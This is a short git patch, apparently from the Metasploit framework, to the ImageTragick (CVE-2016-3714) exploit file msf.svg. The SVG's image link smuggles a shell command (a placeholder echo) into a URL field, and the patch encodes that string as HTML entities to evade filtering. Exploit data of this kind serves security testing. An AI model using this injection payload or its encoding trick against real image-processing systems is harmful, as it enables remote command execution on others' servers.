From decd770a0b2bb7eafcce8a014bfa86f0bf891a55 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 4 May 2016 20:37:21 -0500
Subject: [PATCH] Encode the entire SVG string

Because why not? Not like people care about what's around the command.
---
 data/exploits/CVE-2016-3714/msf.svg | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/exploits/CVE-2016-3714/msf.svg b/data/exploits/CVE-2016-3714/msf.svg
index 6f874eec01..b1ca79d466 100644
--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="https:&quot;;echo vulnerable&quot;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>